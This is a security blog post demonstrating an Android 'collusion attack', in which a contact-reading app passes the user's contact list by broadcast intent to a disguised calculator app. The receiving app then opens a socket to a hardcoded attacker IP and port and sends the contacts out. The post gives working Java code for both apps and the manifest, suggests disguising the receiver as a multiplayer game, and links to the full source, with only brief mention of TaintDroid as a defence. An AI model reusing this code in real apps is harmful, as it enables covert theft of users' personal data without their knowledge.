Collusion attack in Android Applications

-

Collusion Attack is one of the ways to bypass android permissions and steal user's data. It requires the attacker or a rogue developer to create and install 2 android application in the user's phone. Both these apps can communicate with each other, share data and then sending it to the attacker. 

There are 2 ways to communicate between 2 apps: overtly and covertly. An example of overt communication is to use intents to pass data between 2 apps. An example of covert communication is to use files. One app can write to a file in the internal storage and another app can read that file. An sophisticated way of covert communication would be to communicate by scheduling various events and calculating the time difference. 

In this post, I am demonstrating the overt way of communications. I have 2 apps: Contact reader app (Phone reader App) and a Calculator App  

A pictorial representation of the demo: 


Code snippets:

So, the contact reader app will have the permission to read your contact list. When the app starts it will prompt user to grant permission to read the contacts as shown below: 


Once the user grants the permission to read the contact, it sends an intent to the calculator app. The snippet of the code that sends the contact list to the calculator app:

Context ctxt = this.getApplicationContext();
Intent i = new Intent ( "com.amrita.passingdata.data") ;
i.putExtra("contacts", (CharSequence) output);
i.setComponent(new ComponentName("com.amrita.mycalculator", "com.amrita.mycalculator.MyBroadcastReceiver"));
i.addFlags(Intent.FLAG_INCLUDE_STOPPED_PACKAGES);
ctxt.sendBroadcast(i);
view raw snippet.java hosted with ❤ by GitHub

Now the calculator app registers a broadcast receiver during runtime and statically in the manifest file. 

The code snippet to register a broadcast receiver during runtime:
IntentFilter intentFilter = new IntentFilter("com.amrita.datapssing.data");
MyReceiver = new MyBroadcastReceiver();
if(intentFilter != null)
{
registerReceiver(MyReceiver, intentFilter);
}
view raw broadcast_cal.java hosted with ❤ by GitHub

The code snippet to register a broadcast receiver in the manifest file: 
<receiver android:name=".MyBroadcastReceiver"
android:enabled="true"
android:exported="true">
<intent-filter>
<action android:name="com.amrita.datapassing.data" />
</intent-filter>
</receiver>
view raw broadcast.java hosted with ❤ by GitHub


Once we have registered it, we need to create broadcastreceiver.java file which extracts the data from the intent and sends it to the attacker. 

The code snippet:
public class MyBroadcastReceiver extends BroadcastReceiver {
private static final int SERVERPORT = 3000; #change this ip address
private static final String SERVER_IP = "192.168.58.1"; #Change this ip address
private Socket socket;
String smscontacts;
@Override
public void onReceive(Context context, Intent intent) {
Bundle extras = intent.getExtras();
if (extras != null) {
smscontacts = extras.getString("contacts");
}
new Thread(new ClientThread()).start();
}
class ClientThread implements Runnable {
@Override
public void run() {
try {
InetAddress serverAddr = InetAddress.getByName(SERVER_IP);
socket = new Socket(serverAddr, SERVERPORT);
PrintWriter out = new PrintWriter(new BufferedWriter(
new OutputStreamWriter(socket.getOutputStream())),
true);
out.println(smscontacts);
} catch (UnknownHostException e1) {
e1.printStackTrace();
} catch (IOException e1) {
e1.printStackTrace();
}
}
}
}
view raw broadcastreciver.java hosted with ❤ by GitHub



Once all this is done, the attacker can setup a listener at a port and just capture that data: 




Final Thoughts: 
  • User has to  install both the apps otherwise it doesn't work. 
  • You can replace the calculator with a game that uses multi-player so it has access to internet. You can also replace contact reader app with file manager app. Basically, as long as the apps can communicate, the attack will work.
  • To defend against this type of attack, one needs to install monitoring program that capture the communication going between 2 apps. An example of such a software would be TaintDroid. 
  • The attack works regardless of the version of the Android OS. 
The source code of this attack is made available here: https://github.com/nhegde610/Collusion-Attack-Android

The reference paper for this attack : (https://ieeexplore.ieee.org/document/8328433)
I. Khokhlov and L. Reznik, "Colluded Applications Vulnerabilities in Android Devices," 2017 IEEE 15th Intl Conf on Dependable, Autonomic and Secure Computing, 15th Intl Conf on Pervasive Intelligence and Computing, 3rd Intl Conf on Big Data Intelligence and Computing and Cyber Science and Technology Congress(DASC/PiCom/DataCom/CyberSciTech), Orlando, FL, 2017, pp. 462-469, doi: 10.1109/DASC-PICom-DataCom-CyberSciTec.2017.89.


Comments

Post a Comment

Popular posts from this blog

Loading GootLoader

-
Image
  Disclaimer:  Opinions expressed are solely my own. N one of the ideas expressed in this blog post are shared, supported, or endorsed in any manner by my employer. In this blog, I will be taking a look at the initial GootLoader sample (MD5: 4dd369b5e028beebe3aa5c980960c502 , Sha256: c1029f0b5f4f6dfbe0fe656f075cbb5ccc2fc308087db21438d73394b75ea020).  Available  here:  https://bazaar.abuse.ch/sample/c1029f0b5f4f6dfbe0fe656f075cbb5ccc2fc308087db21438d73394b75ea020/   The sample is a javascript program which is meant to be executed in windows using wscript.exe.  Opening the sample in a text editor, it appears to look like jquery library 3.6.0 (screenshot below). Comparing the sample with jqeury 3.6.0 downloaded from  https://code.jquery.com/jquery-3.6.0.js, differences can be observed.  The following lines shows the code inserted to create the sample:  One important thing to mention about javascript: If a variable is declared wit...
Read more

AUDI SQLi Labs Lesson 1 walkthrough

-
Image
Hi,Everyone! This post is about audi sqli labs lesson 1. Audi Sqli labs is a vulnerable web application which is designed for practicing various forms of sqli injection. You can download it from github: https://github.com/skyblueee/sqli-labs-php7 and follow this video: https://www.youtube.com/watch?v=Ri0e249x5PY for installation. Let's get started with lesson 1. Lesson 1: Let's add ?id=1 in the url. Well, this means that ?id=1 works. Now, let's try to break this query. You can try different values of id such as 10000000, asdwqe,@, ' etc. When you try ?id=1' , you will see an error message. Let's analyse the error. The important part is : ''1'' LIMIT 0,1'  Remove the first single quote: '1'' LIMIT 0,1 Remove "LIMIT 0,1" : '1'' This means that our given input is being enclosed in a single quote(').  You can fix the query while keeping the value of id as 1' by commenting out the...
Read more

Kioptrix Level 1 walkthrough

-
Image
Kioptrix level 1 is one of the easiest boot-to-root machine. It is best suited for beginners to practice their pentesting skills. In this article, we will talk about how to hack kioptrix level 1. Kioptrix level 1 is Red-hat linux 32 bit machine which can easily be run with just 512 MB. You can download the virtual machine from the vulnhub. I hope the reader of this article can figure out how to setup this in a virtual machine. The host machine would be kali 2019.3. The virtualbox version is 6.0. So,after booting up the machine from the virtualbox, we need to find its ip address.We will use the tool netdiscover. The result: 192.168.56.102 is the kioptrix machine. Let's run a simple nmap scan using this ip address. The result: So, basically, we have 6 ports open. Port 22 is ssh using OpenSSH 2.9p2. Port 80 and 443 are using Apache 1.3.20 and mod_ssl version 2.8.4. We also have port 32768 and port 111 which seems to RPCs. Lastly, we have port 139 running samba but...
Read more